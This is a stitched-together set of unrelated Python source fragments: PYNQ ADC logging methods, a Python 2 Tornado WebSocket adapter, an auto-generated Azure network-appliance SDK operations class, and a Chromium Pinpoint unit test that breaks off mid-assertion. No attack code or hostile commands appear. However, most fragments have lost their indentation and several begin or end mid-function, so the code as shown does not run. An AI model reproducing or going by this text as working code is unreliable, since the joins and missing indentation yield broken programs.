"""
if self.log_running == 1:
self.microblaze.write_non_blocking_command(RESET_ADC)
self.log_running = 0
else:
raise RuntimeError("No grove ADC log running.")
def get_log_raw(self):
"""Get the log of raw values.
First stop the log before getting the log.
Returns
-------
list
List of raw samples from the ADC.
"""
# Stop logging
self.stop_log_raw()
# Prep iterators and results list
[head_ptr, tail_ptr] = self.microblaze.read_mailbox(0x8, 2)
readings = list()
# Sweep circular buffer for samples
if head_ptr == tail_ptr:
return None
elif head_ptr < tail_ptr:
num_words = int(ceil((tail_ptr - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += data
else:
num_words = int(ceil((PMOD_ADC_LOG_END - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += data
num_words = int(ceil((tail_ptr - PMOD_ADC_LOG_START) / 4))
data = self.microblaze.read(PMOD_ADC_LOG_START, num_words)
readings += data
return readings
def get_log(self):
"""Get the log of voltage values.
First stop the log before getting the log.
Returns
-------
list
List of voltage samples from the ADC.
"""
# Stop logging
self.stop_log()
# Prep iterators and results list
[head_ptr, tail_ptr] = self.microblaze.read_mailbox(0x8, 2)
readings = list()
# Sweep circular buffer for samples
if head_ptr == tail_ptr:
return None
elif head_ptr < tail_ptr:
num_words = int(ceil((tail_ptr - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += [_reg2float(i) for i in data]
else:
num_words = int(ceil((PMOD_ADC_LOG_END - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += [_reg2float(i) for i in data]
num_words = int(ceil((tail_ptr - PMOD_ADC_LOG_START) / 4))
data = self.microblaze.read(PMOD_ADC_LOG_START, num_words)
readings += [_reg2float(i) for i in data]
return readings
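# ---------------------------------------------------------------------------
# Illustrative usage sketch for the logging API above. The overlay bitstream,
# import path, and driver class name are assumptions about the surrounding
# PYNQ package and may differ for a given board or overlay.
if __name__ == "__main__":
    from pynq.overlays.base import BaseOverlay   # assumed overlay package
    from pynq.lib.pmod import Pmod_ADC           # assumed driver class

    base = BaseOverlay("base.bit")                # assumed bitstream name
    adc = Pmod_ADC(base.PMODA)                    # attach the driver to PMODA
    # Log channel 1 only, one voltage sample every 100 microseconds.
    adc.start_log(ch1=1, ch2=0, ch3=0, log_interval_us=100)
    # ... let the IOP fill its circular buffer for a while ...
    samples = adc.get_log()                       # stops the log and drains the buffer
    print(samples)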
|
|
#-*- coding: utf-8 -*-
import os
import time
import json
import logging
import hashlib
import base64
import threading
import traceback
from Queue import Queue, Empty
from defs import *
try:
import tornado
from tornado.iostream import StreamClosedError
except ImportError:
tornado = None
StreamClosedError = None
class TornadoWebSocketAdapter(object):
def __init__(self, environ, app, request):
self.environ = environ
self.app = app
self.request = request
self.evt_close = threading.Event()
self.f = None
self.q_recv = None
self.threads = []
def html(self):
f = self.request.connection.detach()
if f:
resp = ['HTTP/1.1 403 handshake fail', '', '']
f.write('\r\n'.join(resp))
f.close()
return self
def fail(self):
f = self.request.connection.detach()
if f:
resp = ['HTTP/1.1 400 handshake fail', '', '']
f.write('\r\n'.join(resp))
f.close()
return self
def handshake(self):
request = self.request
headers = request.headers
h_upgrade = headers.get('upgrade', '').lower()
h_connection = headers.get('connection', '').lower()
h_connection = h_connection.split(',')
h_connection = [c.strip() for c in h_connection if c.strip()]
h_key = headers.get('sec-websocket-key', '')
if h_upgrade != 'websocket':
self.fail()
return
elif 'upgrade' not in h_connection:
self.fail()
return
elif not h_key:
self.fail()
return
# -- handshake
protocol = headers.get('sec-websocket-protocol', '')
version = headers.get('sec-websocket-version', '')
key_hash = '%s%s' % (h_key, ws_uid)
key_hash = base64.b64encode(hashlib.sha1(key_hash).digest())
_headers = [('upgrade', 'websocket'),
('connection', 'upgrade'),
('sec-websocket-accept', key_hash),
('x-handshake-by', 'TornadoWebSocketAdapter'),]
f = request.connection.detach()
self.f = f
f.set_close_callback(self.on_connection_close)
resp = ['HTTP/1.1 101 Switching protocols']
resp.extend([': '.join(h) for h in _headers])
resp.extend(['', ''])
f.write('\r\n'.join(resp))
# f.write(make_frame(1, OP_PING, ''))
# f.write(make_frame(1, OP_TEXT, 'hello from tornado!'))
return True
# --------------------
# for flask view
# --------------------
def handle(self, handler, values):
self.q_recv = Queue()
f = self.f
th = threading.Thread(target=self._recv,
args=(f,))
th.setDaemon(True)
th.start()
pid = os.getpid()
tid = th.ident
        th.setName('ws-%s-handle-recv-%s' % (pid, tid))
th_h = threading.Thread(target=self._handler,
args=(handler, values))
th_h.setDaemon(True)
th_h.start()
tid = th_h.ident
        th_h.setName('ws-%s-handler-%s' % (pid, tid))
self.threads.append(th)
self.threads.append(th_h)
return self
def _handler(self, handler, values):
try:
handler(self, values)
except Exception, e:
logging.error('_handler -> handler()')
logging.error(traceback.format_exc(e))
self._abort()
def _recv(self, f):
while not self.evt_close.is_set():
frame = None
try:
frame = parse_frame(f)
except (StreamClosedError, WsIOError):
break
except WsClosedByRemote:
break
except Exception, e:
logging.error('_recv -> parse_frame(f)')
logging.error(traceback.format_exc(e))
break
if not frame:
continue
self.q_recv.put(frame)
self._abort()
def recv(self, timeout=5.0):
if self.evt_close.is_set():
return
        t0 = time.time()
        while not self.evt_close.is_set():
            try:
                frame = self.q_recv.get(True, 0.1)
                if frame:
                    return frame
            except Empty:
                pass
            # Give up once the timeout has elapsed.
            if time.time() > t0 + timeout:
                return
# --------------------
# for server class
# --------------------
def server(self, server):
pid = os.getpid()
th = threading.Thread(target=self._recv_for_server,
args=(self.f, server))
th.setDaemon(True)
th.start()
tid = th.ident
th.setName('ws-%s-server-recv-%s' % (pid, tid))
# self.threads.append(th)
return self
def _recv_for_server(self, f, server):
self._safe_invoke(server, 'on_open', self)
while not self.evt_close.is_set():
frame = None
try:
frame = parse_frame(f)
except (StreamClosedError, WsIOError):
break
except WsClosedByRemote:
break
except Exception, e:
logging.error('_recv_for_server -> parse_frame')
logging.error(traceback.format_exc(e))
break
if not frame:
continue
self._safe_invoke(server, 'on_message', self, frame)
self._safe_invoke(server, 'on_close', self)
self._abort()
# --------------------
def _safe_invoke(self, server, method, *args, **kargs):
if not server or not method:
return
if not hasattr(server, method):
return
try:
getattr(server, method)(*args, **kargs)
        except Exception, e:
            logging.error('_safe_invoke: %s()' % method)
            logging.error(traceback.format_exc(e))
# --------------------
def send_json(self, v, fin=True, op=OP_TEXT):
if isinstance(v, (unicode, str)):
return self.send(v)
else:
return self.send(json.dumps(v))
def send(self, msg, fin=True, op=OP_TEXT):
if self.evt_close.is_set():
return
frame = make_frame(fin, op, msg or '')
try:
if self.f and not self.f.closed():
self.f.write(frame)
except (StreamClosedError, WsIOError):
self._abort()
except Exception, e:
logging.error('send -> self.f.write(frame)')
logging.error(traceback.format_exc(e))
self._abort()
def close(self):
logging.info('TornadoWebSocketAdapter.close()')
self.send('', op=OP_CLOSE)
self._abort()
def on_connection_close(self):
logging.info('TornadoWebSocketAdapter.on_connection_close()')
self._abort()
def _abort(self):
logging.info('TornadoWebSocketAdapter._abort(): start to clean up')
if not self.evt_close.is_set():
self.evt_close.set()
if self.f:
try:
if not self.f.closed():
self.f.close()
except Exception, e:
logging.warn('_abort -> self.f.close()')
logging.warn(traceback.format_exc(e))
self.f = None
try:
curr_th = threading.current_thread()
while self.threads:
th = self.threads.pop()
if not th:
continue
if th == curr_th:
continue
                if th.is_alive():
                    th.join()
except IndexError:
pass
        logging.info('TornadoWebSocketAdapter._abort(): done cleaning.')
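# ---------------------------------------------------------------------------
# Illustrative sketch: a minimal "server" object compatible with the
# on_open/on_message/on_close hooks invoked by _recv_for_server() above.
# How the parsed frame exposes its payload and how the adapter is wired into
# a request handler are assumptions, not part of this module.
class EchoServer(object):
    def on_open(self, ws):
        ws.send('hello')                  # greet the client on connect
    def on_message(self, ws, frame):
        # frame is whatever parse_frame() yields; echoing a text payload is an
        # assumption about the frame structure defined in defs.py
        ws.send(getattr(frame, 'payload', ''))
    def on_close(self, ws):
        pass
# Assumed wiring inside a request handler (sketch only):
#     adapter = TornadoWebSocketAdapter(environ, app, request)
#     if adapter.handshake():
#         adapter.server(EchoServer())    # or adapter.handle(view_func, values) for the flask-view path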
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkVirtualAppliancesOperations(object):
"""NetworkVirtualAppliancesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_virtual_appliance_name=network_virtual_appliance_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
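    # Illustrative call pattern for the long-running delete above (sketch only;
    # reaching this operations group through a NetworkManagementClient and the
    # resource names used here are assumptions, not part of this generated file):
    #
    #     poller = client.network_virtual_appliances.begin_delete(
    #         resource_group_name="my-rg",
    #         network_virtual_appliance_name="my-nva")
    #     poller.result()   # blocks until the LRO completes (returns None)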
def get(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
"""Gets the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkVirtualAppliance, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
"""Updates a Network Virtual Appliance.
:param resource_group_name: The resource group name of Network Virtual Appliance.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance being updated.
:type network_virtual_appliance_name: str
:param parameters: Parameters supplied to Update Network Virtual Appliance Tags.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkVirtualAppliance, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.NetworkVirtualAppliance"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkVirtualAppliance')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.NetworkVirtualAppliance"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.NetworkVirtualAppliance"]
"""Creates or updates the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:param parameters: Parameters supplied to the create or update Network Virtual Appliance.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkVirtualAppliance or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_virtual_appliance_name=network_virtual_appliance_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkVirtualApplianceListResult"]
"""Lists all Network Virtual Appliances in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkVirtualApplianceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualApplianceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualApplianceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkVirtualApplianceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkVirtualApplianceListResult"]
"""Gets all Network Virtual Appliances in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkVirtualApplianceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualApplianceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualApplianceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkVirtualApplianceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkVirtualAppliances'} # type: ignore
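# Illustrative sketch of the paging behaviour of the list operations above.
# Constructing the client requires a credential and subscription id; the
# azure.identity import and the placeholder values are assumptions about the
# consuming application, not part of this generated file.
if __name__ == "__main__":
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.network import NetworkManagementClient

    client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
    for appliance in client.network_virtual_appliances.list_by_resource_group("my-rg"):
        print(appliance.name)   # ItemPaged transparently follows next_link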
|
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import mock
from dashboard.pinpoint import test
from dashboard.pinpoint.models import change as change_module
from dashboard.pinpoint.models import event as event_module
from dashboard.pinpoint.models import isolate
from dashboard.pinpoint.models import job as job_module
from dashboard.pinpoint.models import task as task_module
from dashboard.pinpoint.models.tasks import find_isolate
# The find_isolate Evaluator is special because it's meant to handle a "leaf"
# task in a graph, so we can test the evaluator on its own without setting up
# dependencies.
class FindIsolateEvaluatorBase(test.TestCase):
def setUp(self):
super(FindIsolateEvaluatorBase, self).setUp()
self.maxDiff = None # pylint: disable=invalid-name
self.job = job_module.Job.New((), ())
task_module.PopulateTaskGraph(
self.job,
find_isolate.CreateGraph(
find_isolate.TaskOptions(
builder='Mac Builder',
target='telemetry_perf_tests',
bucket='luci.bucket',
change=change_module.Change.FromDict({
'commits': [{
'repository': 'chromium',
'git_hash': '7c7e90be',
}],
}))))
@mock.patch('dashboard.services.buildbucket_service.GetJobStatus')
@mock.patch('dashboard.services.buildbucket_service.Put')
class FindIsolateEvaluatorTest(FindIsolateEvaluatorBase):
def testInitiate_FoundIsolate(self, *_):
# Seed the isolate for this change.
change = change_module.Change(
commits=[change_module.Commit('chromium', '7c7e90be')])
isolate.Put((('Mac Builder', change, 'telemetry_perf_tests',
'https://isolate.server', '7c7e90be'),))
# Then ensure that we can find the seeded isolate for the specified
# revision.
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'change': mock.ANY,
'isolate_hash': '7c7e90be',
'isolate_server': 'https://isolate.server',
'status': 'completed',
'target': 'telemetry_perf_tests',
